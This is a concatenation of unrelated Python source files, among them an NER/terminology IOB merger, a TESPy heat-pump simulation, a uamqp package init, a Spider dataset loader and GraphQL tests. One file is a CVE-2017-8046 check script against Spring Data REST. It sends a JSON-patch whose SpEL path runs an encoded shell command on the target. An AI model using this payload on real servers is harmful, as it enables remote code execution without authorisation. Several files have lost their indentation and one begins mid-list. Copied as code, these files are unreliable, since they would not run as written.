'west', 'wheel', 'wheels', 'whip', 'whips', 'whirl', 'whirls', 'whisper', 'whispers', 'whistle', 'whistles', 'wholesale', 'wholesales', 'width', 'widths', 'wiggle', 'wiggles', 'wills', 'win', 'winch', 'winches', 'wind', 'windings', 'windlass', 'windlasses', 'window', 'windows', 'winds', 'wine', 'wines', 'wing', 'wingnut', 'wingnuts', 'wings', 'wins', 'winter', 'winters', 'wire', 'wires', 'wish', 'wishes', 'withdrawal', 'withdrawals', 'witness', 'witnesses', 'woman', 'women', 'wonder', 'wonders', 'wood', 'woods', 'wool', 'wools', 'word', 'words', 'work', 'workbook', 'workbooks', 'workings', 'workload', 'workloads', 'workman', 'workmen', 'works', 'worksheet', 'worksheets', 'world', 'worlds', 'worm', 'worms', 'worries', 'worry', 'worth', 'wounds', 'wrap', 'wraps', 'wreck', 'wrecks', 'wrench', 'wrenches', 'wrist', 'wrists', 'writer', 'writers', 'writing', 'writings', 'yard', 'yards', 'yarn', 'yarns', 'yaw', 'yaws', 'year', 'years', 'yell', 'yells', 'yield', 'yields', 'yolk', 'yolks', 'zero', 'zeros', 'zip', 'zips', 'zone', 'zones', 'can', 'may', 'accounting', 'bearing', 'bracing', 'briefing', 'coupling', 'damping', 'ending', 'engineering', 'feeling', 'heading', 'meaning', 'rating', 'rigging', 'ring', 
'schooling', 'sizing', 'sling', 'winding', 'inaction', 'nonavailability', 'nothing', 'broadcast', 'cast', 'cost', 'cut', 'drunk', 'felt', 'forecast', 'ground', 'hit', 'lent', 'offset', 'set', 'shed', 'shot', 'slit', 'thought', 'wound']
for x in range(8):
    print(random.choice(word_list))
|
#!/usr/bin/python3
# Copyright 2021 FBK
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# The script takes two positional arguments:
# 1. The IOB file containing the NE annotations
# 2. The IOB file containing the terminology annotation
# It merges the two files into a single IOB file, giving priority to the NE
# annotation when the two conflict, and recovering from possibly different
# tokenizations of the two files.
# The output is written to stdout, so an example of usage of this script is:
# python combine_ne_terms.py ne.iob.en terms.iob.en > all.iob.en
# If using, please cite:
# M. Gaido et al., 2021. Is "moby dick" a Whale or a Bird? Named Entities and Terminology in Speech Translation,
# Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing (EMNLP)
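# A small illustrative sketch (hypothetical tokens, not taken from the paper's data)
# of the merge when both files annotate the same span:
#
#   ne.iob.en             terms.iob.en           merged output
#   1  moby   B-PER       1  moby   B-TERM       1  moby   B-PER
#   2  dick   I-PER       2  dick   I-TERM       2  dick   I-PER
#   3  swims  O           3  swims  O            3  swims  O
#
# The NE annotation wins on the conflicting tokens, as described above.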
import sys
ner_detected_fn = sys.argv[1]
term_detected_fn = sys.argv[2]
def select_type(types):
# It might continue in the next line...
if types[-1] != "O":
return types[-1]
return sorted(types, key=types.count, reverse=True)[0]
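# For example, select_type(["O", "PER", "O"]) returns "O" (the most frequent tag),
# while select_type(["O", "PER"]) returns "PER": a non-"O" final tag means the
# annotation may continue on the next token, so it takes priority.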
NER_BUFFER = []
NER_TYPES_BUFFER = []
term_line = None
prev_type = None
l_idx = 0
with open(ner_detected_fn) as ner_f, open(term_detected_fn) as term_f:
for ner_line in ner_f:
ner_items = ner_line.split('\t')
if len(ner_items) < 3:
term_line = term_f.readline()
assert len(term_line.split('\t')) < 3, "Mismatch at line: {} --- {}".format(ner_line, term_line)
l_idx = 0
sys.stdout.write(ner_line)
else:
assert len(ner_items) == 3
if len(NER_BUFFER) == 0:
term_line = term_f.readline()
term_items = [t.strip() for t in term_line.split("\t")]
NER_BUFFER.append(ner_items[1])
ner_term = "".join(NER_BUFFER)
ner_type = ner_items[2].strip()
if ner_term == term_items[1]:
if NER_TYPES_BUFFER:
NER_TYPES_BUFFER.append(ner_type)
ner_types = [t.split("-")[-1] for t in NER_TYPES_BUFFER]
ner_type = select_type(ner_types)
if ner_type != "O":
if "B" in [t.split("-")[0] for t in NER_TYPES_BUFFER]:
ner_type = "B-" + ner_type
else:
ner_type = "I-" + ner_type
NER_BUFFER = []
NER_TYPES_BUFFER = []
else:
if len(ner_term) < len(term_items[1]):
NER_TYPES_BUFFER.append(ner_type)
continue
else:
term_term = term_items[1]
term_types_buffer = [term_items[2]]
term_ids = []
if len(term_items) > 3:
term_ids.append(term_items[3])
missing_ner_items = False
while term_term != ner_term:
if len(ner_term) > len(term_term):
term_line = term_f.readline()
term_items = term_line.split("\t")
term_term += term_items[1]
term_types_buffer.append(term_items[2].strip())
if len(term_items) > 3:
term_ids.append(term_items[3].strip())
else:
missing_ner_items = True
break
term_types = [t.split("-")[-1] for t in term_types_buffer]
term_type = select_type(term_types)
if term_type != "O":
if "B" in [t.split("-")[0] for t in term_types_buffer]:
term_type = "B-" + term_type
else:
term_type = "I-" + term_type
term_items = [term_items[0], term_term, term_type, "".join(term_ids)]
else:
term_items = [term_items[0], term_term, term_type]
if missing_ner_items:
continue
else:
NER_BUFFER = []
NER_TYPES_BUFFER = []
l_idx += 1
if ner_type.strip() == 'O':
if term_items[2] == "I-TERM" and prev_type not in ["B-TERM", "I-TERM"]:
# Most likely part of a term has been considered as a NE, so ignore it
term_items[2] = "O"
sys.stdout.write("{}\t{}\n".format(l_idx, "\t".join(term_items[1:])))
prev_type = term_items[2]
else:
if ner_type.startswith("I-") and prev_type not in [ner_type, "B-" + ner_type.split("-")[1]]:
ner_type = "B-" + ner_type.split("-")[1]
sys.stdout.write("{}\t{}\t{}\n".format(l_idx, ner_term, ner_type))
prev_type = ner_type
|
from {{ cookiecutter.project_name_snake_case }} import {{ cookiecutter.project_name_snake_case }}
def test_add_integration():
res = {{ cookiecutter.project_name_snake_case }}.add(2, 3)
assert res == 5
|
# -*- coding: utf-8 -*-
from tespy.networks import Network
from tespy.components import (
Sink, Source, Splitter, Compressor, Condenser, Pump, HeatExchangerSimple,
Valve, Drum, HeatExchanger, CycleCloser
)
from tespy.connections import Connection, Ref
from tespy.tools.characteristics import CharLine
from tespy.tools.characteristics import load_default_char as ldc
from tespy.tools import document_model
import numpy as np
import pandas as pd
# %% network
nw = Network(
fluids=['water', 'NH3', 'air'], T_unit='C', p_unit='bar', h_unit='kJ / kg',
m_unit='kg / s'
)
# %% components
# sources & sinks
cc = CycleCloser('coolant cycle closer')
cc_cons = CycleCloser('consumer cycle closer')
amb = Source('ambient air')
amb_out1 = Sink('sink ambient 1')
amb_out2 = Sink('sink ambient 2')
# ambient system
sp = Splitter('splitter')
pu = Pump('pump')
# consumer system
cd = Condenser('condenser')
dhp = Pump('district heating pump')
cons = HeatExchangerSimple('consumer')
# evaporator system
ves = Valve('valve')
dr = Drum('drum')
ev = HeatExchanger('evaporator')
su = HeatExchanger('superheater')
erp = Pump('evaporator recirculation pump')
# compressor-system
cp1 = Compressor('compressor 1')
cp2 = Compressor('compressor 2')
ic = HeatExchanger('intercooler')
# %% connections
# consumer system
c_in_cd = Connection(cc, 'out1', cd, 'in1')
cb_dhp = Connection(cc_cons, 'out1', dhp, 'in1')
dhp_cd = Connection(dhp, 'out1', cd, 'in2')
cd_cons = Connection(cd, 'out2', cons, 'in1')
cons_cf = Connection(cons, 'out1', cc_cons, 'in1')
nw.add_conns(c_in_cd, cb_dhp, dhp_cd, cd_cons, cons_cf)
# connection condenser - evaporator system
cd_ves = Connection(cd, 'out1', ves, 'in1')
nw.add_conns(cd_ves)
# evaporator system
ves_dr = Connection(ves, 'out1', dr, 'in1')
dr_erp = Connection(dr, 'out1', erp, 'in1')
erp_ev = Connection(erp, 'out1', ev, 'in2')
ev_dr = Connection(ev, 'out2', dr, 'in2')
dr_su = Connection(dr, 'out2', su, 'in2')
nw.add_conns(ves_dr, dr_erp, erp_ev, ev_dr, dr_su)
amb_p = Connection(amb, 'out1', pu, 'in1')
p_sp = Connection(pu, 'out1', sp, 'in1')
sp_su = Connection(sp, 'out1', su, 'in1')
su_ev = Connection(su, 'out1', ev, 'in1')
ev_amb_out = Connection(ev, 'out1', amb_out1, 'in1')
nw.add_conns(amb_p, p_sp, sp_su, su_ev, ev_amb_out)
# connection evaporator system - compressor system
su_cp1 = Connection(su, 'out2', cp1, 'in1')
nw.add_conns(su_cp1)
# compressor-system
cp1_he = Connection(cp1, 'out1', ic, 'in1')
he_cp2 = Connection(ic, 'out1', cp2, 'in1')
cp2_c_out = Connection(cp2, 'out1', cc, 'in1')
sp_ic = Connection(sp, 'out2', ic, 'in2')
ic_out = Connection(ic, 'out2', amb_out2, 'in1')
nw.add_conns(cp1_he, he_cp2, sp_ic, ic_out, cp2_c_out)
# %% component parametrization
# condenser system
cd.set_attr(pr1=0.99, pr2=0.99, ttd_u=5, design=['pr2', 'ttd_u'],
offdesign=['zeta2', 'kA_char'])
dhp.set_attr(eta_s=0.8, design=['eta_s'], offdesign=['eta_s_char'])
cons.set_attr(pr=0.99, design=['pr'], offdesign=['zeta'])
# water pump
pu.set_attr(eta_s=0.75, design=['eta_s'], offdesign=['eta_s_char'])
# evaporator system
kA_char1 = ldc('heat exchanger', 'kA_char1', 'DEFAULT', CharLine)
kA_char2 = ldc('heat exchanger', 'kA_char2', 'EVAPORATING FLUID', CharLine)
ev.set_attr(pr1=0.98, pr2=0.99, ttd_l=5,
kA_char1=kA_char1, kA_char2=kA_char2,
design=['pr1', 'ttd_l'], offdesign=['zeta1', 'kA_char'])
su.set_attr(pr1=0.98, pr2=0.99, ttd_u=2, design=['pr1', 'pr2', 'ttd_u'],
offdesign=['zeta1', 'zeta2', 'kA_char'])
erp.set_attr(eta_s=0.8, design=['eta_s'], offdesign=['eta_s_char'])
# compressor system
cp1.set_attr(eta_s=0.85, design=['eta_s'], offdesign=['eta_s_char'])
cp2.set_attr(eta_s=0.9, pr=3, design=['eta_s'], offdesign=['eta_s_char'])
ic.set_attr(pr1=0.99, pr2=0.98, design=['pr1', 'pr2'],
offdesign=['zeta1', 'zeta2', 'kA_char'])
# %% connection parametrization
# condenser system
c_in_cd.set_attr(fluid={'air': 0, 'NH3': 1, 'water': 0})
cb_dhp.set_attr(T=60, p=10, fluid={'air': 0, 'NH3': 0, 'water': 1})
cd_cons.set_attr(T=90)
# evaporator system cold side
erp_ev.set_attr(m=Ref(ves_dr, 1.25, 0), p0=5)
su_cp1.set_attr(p0=5, state='g')
# evaporator system hot side
# pumping at constant rate at part load
amb_p.set_attr(T=12, p=2, fluid={'air': 0, 'NH3': 0, 'water': 1},
offdesign=['v'])
sp_su.set_attr(offdesign=['v'])
ev_amb_out.set_attr(p=2, T=9, design=['T'])
# compressor-system
he_cp2.set_attr(Td_bp=5, p0=20, design=['Td_bp'])
ic_out.set_attr(T=30, design=['T'])
# %% key parameter
cons.set_attr(Q=-200e3)
# %% Calculation
nw.solve('design')
nw.print_results()
nw.save('heat_pump_water')
document_model(nw, filename='report_water_design.tex')
# offdesign test
nw.solve('offdesign', design_path='heat_pump_water')
document_model(nw, filename='report_water_offdesign.tex')
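# Part-load sweep: for each ambient temperature and heat load the stored value is the
# heating COP, i.e. |Q_condenser| divided by the power drawn by the compressors
# (cp1, cp2) and the circulation pumps (erp, pu); see the eps calculation below.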
T_range = [6, 12, 18, 24, 30]
Q_range = np.array([100e3, 120e3, 140e3, 160e3, 180e3, 200e3, 220e3])
df = pd.DataFrame(columns=Q_range / -cons.Q.val)
for T in T_range:
amb_p.set_attr(T=T)
eps = []
for Q in Q_range:
cons.set_attr(Q=-Q)
nw.solve('offdesign', design_path='heat_pump_water')
if nw.lin_dep:
eps += [np.nan]
else:
eps += [
abs(cd.Q.val) / (cp1.P.val + cp2.P.val + erp.P.val + pu.P.val)
]
df.loc[T] = eps
df.to_csv('COP_water.csv')
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function
import sys
import pytest
class Collector(object):
RUN_INDIVIDUALLY = ['tests/test_pex.py']
def __init__(self):
self._collected = set()
def iter_collected(self):
for collected in sorted(self._collected):
yield collected
def pytest_collectreport(self, report):
if report.failed:
raise pytest.UsageError('Errors during collection, aborting!')
def pytest_collection_modifyitems(self, items):
for item in items:
test_file = item.location[0]
if test_file in self.RUN_INDIVIDUALLY:
self._collected.add(item.nodeid)
else:
self._collected.add(test_file)
collector = Collector()
rv = pytest.main(['--collect-only'] + sys.argv[1:], plugins=[collector])
for test_target in collector.iter_collected():
print('RUNNABLE\t"{}"'.format(test_target))
sys.exit(rv)
|
from django.http import HttpResponse
def index(request):
return HttpResponse("<h1> This is the music app homepage </h1>")
|
# -*- coding: utf-8 -*-
from keras_bert import Tokenizer
class TokenizerReturningSpace(Tokenizer):
"""
"""
def _tokenize(self, text):
R = []
for c in text:
if c in self._token_dict:
R.append(c)
elif self._is_space(c):
R.append('[unused1]')
else:
R.append('[UNK]')
return R
class EnglishTokenizer(Tokenizer):
"""
"""
pass
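# Minimal usage sketch (hypothetical token dictionary, not shipped with this module):
#
#   token_dict = {'[CLS]': 0, '[SEP]': 1, '[UNK]': 2, '[unused1]': 3, 'a': 4, 'b': 5}
#   tokenizer = TokenizerReturningSpace(token_dict)
#   print(tokenizer.tokenize('a b'))
#
# With the overridden _tokenize above, the space between 'a' and 'b' should come back
# as '[unused1]' instead of being dropped by the default tokenizer.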
|
#!/usr/bin/env python3
import json
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class CVE_2017_8046_BaseVerify:
def __init__(self, url):
self.info = {
            'name': 'CVE-2017-8046 vulnerability',
            'description': 'CVE-2017-8046 allows arbitrary command execution. The command run here is /usr/bin/touch ./test.jsp, converted (e.g. with the Xiaokui tool) to the ASCII byte sequence 47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112. Affected versions: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1)',
'date': '2017-04-21',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers1 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json",
"Cache-Control": "no-cache"
}
self.headers2 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json-patch+json",
"Cache-Control": "no-cache"
}
self.data1 = {
"firstName": "VulApps",
"lastName": "VulApps"
}
self.data2 = [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", "value": "vulapps-demo" }]
def check(self):
"""
        Check whether the target is vulnerable
        :param:
        :return bool True or False: whether the vulnerability exists
"""
try:
response1 = request.post(self.url + '/customers', headers = self.headers1, data = json.dumps(self.data1))
response2 = request.patch(self.url + '/customers/1', headers = self.headers2, data = json.dumps(self.data2))
content2 = response2.text
if 'maybe not public' in content2:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == '__main__':
CVE_2017_8046 = CVE_2017_8046_BaseVerify('http://192.168.30.242:8086')
CVE_2017_8046.check()
|
"""
This script is used to generate simulated count data based on a Mantid
script.
"""
import os
import numpy
def VariableStatsData(N, A0, omega, phi, sigma, bg):
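    # The model resembles a muon-decay asymmetry spectrum: a Gaussian-damped oscillation
    # on top of an exponential decay (2.197 is consistent with the muon lifetime in
    # microseconds), plus a flat background, later sampled with Poisson noise.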
x = numpy.linspace(start=0.0, stop=32.0, num=2001)
y = (1+A0*numpy.cos(omega*x+phi)*numpy.exp(-(sigma*x)**2)) * \
numpy.exp(-x/2.197)+bg
NN = N/numpy.sum(y) # normalisation so whole spectrum has ~N counts
return (x, numpy.random.poisson(y*NN))
def write_data(x, y, part=0):
path = f'{os.path.dirname(__file__)}/../data_files'
part_str = part if part != 0 else ""
with open(f'{path}/simulated_mantid{part_str}.txt', 'w') as f:
f.write('# X Y\n')
lines = [[x[i], y[i]]
# if y[i] != 0 # Uncomment to replace 0s with 1s
# else [x[i], 1]
for i in range(len(x))
# if y[i] != 0 # Uncomment to ignore 0 values
]
f.writelines([f'{i} {j}\n' for i, j in lines])
def write_problem(N, part=0):
path = f'{os.path.dirname(__file__)}/..'
part_str = part if part != 0 else ""
with open(f'{path}/simulated_mantid{part_str}.txt', 'w') as f:
f.write('# FitBenchmark Problem\n')
f.write("software = 'Mantid'\n")
f.write(f"name = 'Simulated poisson (Mantid) {part_str}'\n")
f.write("description = 'A simulated dataset for testing poisson cost"
"functions, based on a simple simulation from Mantid.'\n")
f.write(f"input_file = 'simulated_mantid{part_str}.txt'\n")
f.write("function = 'name=UserFunction,"
"Formula=N*((1+A*cos(omega*x+phi)*exp(-(sigma*x)^2))*"
"exp(-x/2.197)+bg),"
f"N={0.007*N},"
"A=0.3,"
"omega=0.9,"
"phi=0.2,"
"sigma=0.12,"
"bg=0.001'\n")
if __name__ == '__main__':
chunks = [1] #,8,16,20,32,40,50,100]
num = 1000
N0 = 4e5
for i, part in enumerate(chunks):
args = {'N': 1000/part,
'A0': 0.25,
'omega': 1.0,
'phi': 0.1,
'sigma': 0.1,
'bg': 1.E-4}
x, y = VariableStatsData(**args)
write_data(x, y, part=i)
write_problem(N=args['N'], part=i)
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=no-member
import logging
import sys
from uamqp import c_uamqp # pylint: disable=import-self
from uamqp.message import Message, BatchMessage
from uamqp.address import Source, Target
from uamqp.connection import Connection
from uamqp.session import Session
from uamqp.client import AMQPClient, SendClient, ReceiveClient
from uamqp.sender import MessageSender
from uamqp.receiver import MessageReceiver
from uamqp.constants import TransportType, MessageBodyType
try:
from uamqp.async_ops import ConnectionAsync
from uamqp.async_ops import SessionAsync
from uamqp.async_ops import MessageSenderAsync
from uamqp.async_ops import MessageReceiverAsync
from uamqp.async_ops.client_async import (
AMQPClientAsync,
SendClientAsync,
ReceiveClientAsync,
AsyncMessageIter)
except (SyntaxError, ImportError):
pass # Async not supported.
__version__ = "1.5.0"
_logger = logging.getLogger(__name__)
_is_win = sys.platform.startswith('win')
c_uamqp.set_python_logger()
def send_message(target, data, auth=None, debug=False):
"""Send a single message to AMQP endpoint.
:param target: The target AMQP endpoint.
:type target: str, bytes or ~uamqp.address.Target
:param data: The contents of the message to send.
:type data: str, bytes or ~uamqp.message.Message
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
    If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:return: A list of states for each message sent.
:rtype: list[~uamqp.constants.MessageState]
"""
message = data if isinstance(data, Message) else Message(body=data)
with SendClient(target, auth=auth, debug=debug) as send_client:
send_client.queue_message(message) # pylint: disable=no-member
return send_client.send_all_messages() # pylint: disable=no-member
def receive_message(source, auth=None, timeout=0, debug=False):
"""Receive a single message from an AMQP endpoint.
:param source: The AMQP source endpoint to receive from.
:type source: str, bytes or ~uamqp.address.Source
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
    If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param timeout: The timeout in milliseconds after which to return None if no messages
are retrieved. If set to `0` (the default), the receiver will not timeout and
will continue to wait for messages until interrupted.
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:rtype: ~uamqp.message.Message or None
"""
received = receive_messages(source, auth=auth, max_batch_size=1, timeout=timeout, debug=debug)
if received:
return received[0]
return None
def receive_messages(source, auth=None, max_batch_size=None, timeout=0, debug=False, **kwargs):
"""Receive a batch of messages from an AMQP endpoint.
:param source: The AMQP source endpoint to receive from.
:type source: str, bytes or ~uamqp.address.Source
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of ~uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
    If no authentication is supplied, SASLAnonymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param max_batch_size: The maximum number of messages to return in a batch. If the
receiver receives a smaller number than this, it will not wait to return them so
the actual number returned can be anything up to this value. If the receiver reaches
a timeout, an empty list will be returned.
:param timeout: The timeout in milliseconds after which to return if no messages
are retrieved. If set to `0` (the default), the receiver will not timeout and
will continue to wait for messages until interrupted.
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:rtype: list[~uamqp.message.Message]
"""
if max_batch_size:
kwargs['prefetch'] = max_batch_size
with ReceiveClient(source, auth=auth, debug=debug, **kwargs) as receive_client:
return receive_client.receive_message_batch( # pylint: disable=no-member
max_batch_size=max_batch_size or receive_client._prefetch, timeout=timeout) # pylint: disable=protected-access, no-member
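# Illustrative round trip with the helpers above (hypothetical endpoint and credentials,
# shown only to sketch the call pattern):
#
#   from uamqp import authentication
#   target = "amqps://my-namespace.servicebus.windows.net/myqueue"
#   auth = authentication.SASLPlain("my-namespace.servicebus.windows.net", "keyname", "key")
#   send_message(target, b"hello", auth=auth)
#   batch = receive_messages(target, auth=auth, max_batch_size=10, timeout=5000)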
class _Platform(object):
"""Runs any platform preparatory steps for the AMQP C
library. This is primarily used for OpenSSL setup.
:ivar initialized: When the setup has completed.
:vartype initialized: bool
"""
initialized = False
@classmethod
def initialize(cls):
"""Initialize the TLS/SSL platform to prepare it for
making AMQP requests. This only needs to happen once.
"""
if cls.initialized:
_logger.debug("Platform already initialized.")
else:
_logger.debug("Initializing platform.")
c_uamqp.platform_init()
cls.initialized = True
@classmethod
def deinitialize(cls):
"""Deinitialize the TLS/SSL platform to prepare it for
making AMQP requests. This only needs to happen once.
"""
if not cls.initialized:
_logger.debug("Platform already deinitialized.")
else:
#cls.initialized = False
_logger.debug("Deinitializing platform.")
#c_uamqp.platform_deinit()
def get_platform_info():
"""Gets the current platform information.
:rtype: str
"""
return str(c_uamqp.get_info())
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Spider: A Large-Scale Human-Labeled Dataset for Text-to-SQL Tasks"""
import json
import os
import datasets
logger = datasets.logging.get_logger(__name__)
_CITATION = """\
@article{yu2018spider,
title={Spider: A large-scale human-labeled dataset for complex and cross-domain semantic parsing and text-to-sql task},
author={Yu, Tao and Zhang, Rui and Yang, Kai and Yasunaga, Michihiro and Wang, Dongxu and Li, Zifan and Ma, James and Li, Irene and Yao, Qingning and Roman, Shanelle and others},
journal={arXiv preprint arXiv:1809.08887},
year={2018}
}
"""
_DESCRIPTION = """\
Spider is a large-scale, complex and cross-domain semantic parsing and text-to-SQL dataset annotated by 11 college students
"""
_HOMEPAGE = "https://yale-lily.github.io/spider"
_LICENSE = "CC BY-SA 4.0"
_URL = "https://huggingface.co/datasets/spider/resolve/main/data/spider.zip"
class Spider(datasets.GeneratorBasedBuilder):
VERSION = datasets.Version("1.0.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(
name="spider",
version=VERSION,
description="Spider: A Large-Scale Human-Labeled Dataset for Text-to-SQL Tasks",
),
]
def _info(self):
features = datasets.Features(
{
"db_id": datasets.Value("string"),
"query": datasets.Value("string"),
"question": datasets.Value("string"),
"query_toks": datasets.features.Sequence(datasets.Value("string")),
"query_toks_no_value": datasets.features.Sequence(datasets.Value("string")),
"question_toks": datasets.features.Sequence(datasets.Value("string")),
}
)
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=features,
supervised_keys=None,
homepage=_HOMEPAGE,
license=_LICENSE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
downloaded_filepath = dl_manager.download_and_extract(_URL)
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"data_filepath": os.path.join(downloaded_filepath, "spider/train_spider.json"),
},
),
datasets.SplitGenerator(
name=datasets.Split.VALIDATION,
gen_kwargs={
"data_filepath": os.path.join(downloaded_filepath, "spider/dev.json"),
},
),
]
def _generate_examples(self, data_filepath):
"""This function returns the examples in the raw (text) form."""
logger.info("generating examples from = %s", data_filepath)
with open(data_filepath, encoding="utf-8") as f:
spider = json.load(f)
for idx, sample in enumerate(spider):
yield idx, {
"db_id": sample["db_id"],
"query": sample["query"],
"question": sample["question"],
"query_toks": sample["query_toks"],
"query_toks_no_value": sample["query_toks_no_value"],
"question_toks": sample["question_toks"],
}
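# Typical usage once the script is available to the `datasets` library (sketch; the exact
# identifier depends on how the dataset is published):
#
#   import datasets
#   spider = datasets.load_dataset("spider")
#   print(spider["train"][0]["question"], "->", spider["train"][0]["query"])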
|
from precisely import all_of, assert_that, contains_exactly, equal_to, has_attrs, has_feature, is_instance
import graphlayer as g
from graphlayer import graphql
from graphql import GraphQLError
def test_execute():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({"value": "resolved"})))
def test_executor():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
execute = graphql.executor(query_type=Root)
result = execute(graph=graph, document_text=query)
assert_that(result, is_success(data=equal_to({"value": "resolved"})))
def test_can_query_schema():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query {
__schema {
queryType { name }
}
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({
"__schema": {
"queryType": {
"name": "Root",
},
},
})))
def test_can_query_schema_with_other_data():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
__schema {
queryType { name }
}
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({
"value": "resolved",
"__schema": {
"queryType": {
"name": "Root",
},
},
})))
def test_variables_can_be_used_in_schema_query():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query ($f: Boolean!, $t: Boolean!) {
included: __schema @include(if: $t) {
queryType { name }
}
excluded: __schema @include(if: $f) {
queryType { name }
}
}
"""
variables = {"t": True, "f": False}
result = graphql.execute(graph=graph, document_text=query, query_type=Root, variables=variables)
assert_that(result, is_success(data=equal_to({
"included": {
"queryType": {
"name": "Root",
},
},
})))
def test_typename():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
return "resolved"
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
__typename
value
typename: __typename
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_success(data=equal_to({"__typename": "Root", "value": "resolved", "typename": "Root"})))
def test_when_query_is_invalid_then_result_is_invalid():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
graph_definition = g.define_graph(resolvers=())
graph = graph_definition.create_graph({})
query = """
query {
bad
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_invalid(errors=contains_exactly(
has_attrs(message="Cannot query field 'bad' on type 'Root'."),
)))
def test_when_resolution_raises_graph_error_then_result_is_invalid():
Root = g.ObjectType("Root", fields=(
g.field("value", g.String),
))
root_resolver = g.root_object_resolver(Root)
@root_resolver.field(Root.fields.value)
def root_resolve_value(graph, query, args):
raise g.GraphError("BAD")
graph_definition = g.define_graph(resolvers=(root_resolver, ))
graph = graph_definition.create_graph({})
query = """
query {
value
}
"""
result = graphql.execute(graph=graph, document_text=query, query_type=Root)
assert_that(result, is_invalid(errors=contains_exactly(
all_of(
is_instance(GraphQLError),
has_str("BAD"),
),
)))
def is_invalid(*, errors):
return has_attrs(errors=errors, data=None)
def is_success(*, data):
return has_attrs(
data=data,
errors=None,
)
def has_str(matcher):
return has_feature("str", str, matcher)
|
import pytest
from IPython.testing.globalipapp import start_ipython
@pytest.fixture(scope="session")
def session_ip():
return start_ipython()
